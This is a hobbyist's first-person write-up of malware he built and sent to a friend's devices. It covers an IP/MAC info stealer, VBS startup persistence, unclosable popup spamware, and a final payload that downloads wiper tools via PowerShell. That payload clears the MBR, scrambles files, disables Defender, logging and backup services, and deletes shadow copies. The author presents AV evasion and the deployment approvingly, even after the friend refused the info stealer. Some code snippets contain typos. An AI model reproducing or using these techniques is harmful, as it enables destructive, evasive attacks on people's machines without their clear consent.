BorderDestroyer is kind enough to let me send him files I made as a way to improve my programing and understanding of malware. Doing this has taught me how to write malware that is not easily detected by most Anti Virus (AV) solutions right out of the box (mainly MalwareBytes due to their low detection rates).

Description

All of this started with Border making that claim "[That1EthicalHacker] is likely already in my system!", which after some comunication he agreed to let me hack his personal devices*. Which had just created a very large door for me to work my little hands up to the knob of to open.

* For more information regarding this, please Click here. To see information about the whole project.

---

Project Creation

At first, I was very nervous to even start programing, which lead me to start collecting information on Border. I was able to collect his name, state of residency and ISP. However, this was not good enough for me, needing to collect even more information I decided to start writing info stealer and remote shell malware.

This lead to me asking Border if he was truly comfortable with this, he was not. Meaning I had to try and find a new way to get his information.

Early files

The first file I created was a simple info stealer, it would collect the following information;

• Public IPv4 address
• Public IPv6 address
• MAC address
• Windows OS version
• Current time
• MISC information

This was made in Python and Batch. The MAC address and MISC information was collected using Batch where the ouptut of commands were saved to files, that would then be parsed in a Python script where the public IPv4 and IPv6 addresses were captured through using "ipify.org" which can be seen in the code snip below

*snip*
# Getting public IPv4
output = requests.get("https://api.ipify.org/?format=json")
output.json()['ip']
*snip*
# Getting public IPv6
output = requests.get("https://api6.apify.org/?format=json")
output.json()['ip']
*snip*

After the information as gathered it would be encrypted with it's hash and sent out to a Github repo I control, that way only I and Border could have access to the information. Now, if you read the project creation you would understand that Border did not want any info stealers to be sent to him, meaning that these programs were now useless to me. But I did learn something from it.

First full file

The full first file I sent to border was a simple anoying script, it would do the following;

• Add itself to user startup folder
• Check and create files that would jumpscare the user on startup
• Randomly restart the device

Now, this all seems great and all, but how did it work? The file that was ran by border would create all the others, it worked as an installer file. The file added to startup was a VBS script that would run a batch payload with no window. It's code can be seen below;

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run Chr(34) & "C:\Users\%USERNAME%\Documents\Per.bat" & Chr(34), 0
Set WshShell = Nothing

The batch payload was a basic script to check for files within certain places, if they didn't exitst the files were made and then ran. This would make it harder for Broder and AV solutions to find the main cause of the spamware (or so I thought at the time).

Second attempt

The first full file, when sent to Border failed due to him not having a version of python installed that was required. Thus I created a new collection that would work regardless of his Python version which did the following;

• Install needed python packages
• Drop popup programs
• Spam popups
• Play "You've Been Trolled" by Antony C

The logic for creating the popups was done in Python using tkinter. The image's raw data was held in base64 which was decoded to then be used as raw bytes for the window created by Tkinter. The audio was also encoded in base64 but was played through pygame. Below is first displaying the image, then playing the audio;

*snip*
# Displaying the image
img = Image.open(io.BytesIO(decoded_image))
tk_img = ImageTkPhotoImage(img)
label = tk.Label(root, image=tk_img)
label.pack()
root.mainloop()

*snip*
# Playing the audio
pygame.mixer.init()
pygane.mixer.music.load(audio_file, file_format)
pygame.mixer.play()
while pygame.mixer.music.get_busy():
    pygame.time.Clock.tick(10)
*snip*

Now, if I were to just spam popups the file would be easily dealt with through closing the popups, thankfully I knew just where to look for fixing this. Taking insperation from the "You Are An Idiot" virus the popups would move around, there was a CMD instance behind the image windows. This was done on purpose, if the user closes one of the images another image would open, but if the CMD was closed, two more instances of the file (runs the image and audio handler) would open. To fix the issue of the user simply restarting the computer, the file was added to user startup.

Third attempt

The third attempt is arguably the most complex, this is due to it using "Hanagman" and "Jack_Ketch"*. Jack_Ketch's version was five to ensure that the data was quickly deal with, Hangman was used to clear the MBR, which while useless on his UEFI enabled device, it would disable any second Legacy boot method he has. With that said, the file did the following;

* For more information on each, Click here.

• Clear the MBR
• Hash all files
• Create a service for NT\AUTH access
• Download needed files
• Different actions based on user input
• Disable security features

The reason that "Download needed files" is included is because all the other files before this one had the data for dropped files held within the stack as variables, downloading the files allows me to pack more features in the malware without needing to remove features from other files. The way that it would go through hashing the files using Jack_Ketch was to prompt the user with a UAC instance.

The file would change what it does based on input from the user, either deleting MBR or not. That is the only difference. The main logic for downloading the files can be seen below;

*snip*
:: Downloading files
powershell -Command "Invoke-WebRequest -Uri ::URL to JackKetch -OutFile C:\Users\Public\jack_ketch.exe" > nul
powershell -Command "Invoke-WebRequest -Uri ::URL to Hangman -OutFile C:\Users\Public\hangman.exe" > nul
*snip*

The security features disabled are the following;

• Windows Defender Realtime protection
• Windows Defender Behavior monitoring
• Windows Defender Block at first sight
• WinDefend service
• SecurityHealthService service
• WdNisSvc service
• EventLog service
• Sysmon service
• Audit service
• wscsvc service
• RemoteRegistry service
• VSS service
• BITS service
• MBAMService service
• AVP service
• McAfeeFramework service
• SQLWriter service
• wbengine service
• SDRSVC service
• BackupExecAccelerator

Any shadow coppies and other recovery methods would be deleted or cleared as well. This is to ensure that Jack_Ketch can run with no issues so that all of the local disks get handled.

Socials:

• YouTube
• Github
• Twitch

Special thanks to:

• BorderDestroyer
• RussianSpy
• CCNA 1 teacher
• Rishik
• Cybersecurity teacher
• Computer science 1 teacher

And I do really mean thanks. Due to your support, testing, and advice regarding my programs it is possible that I even program! If it wasnt for your help, I would be working towards becoming an auto-mechanic (it's true)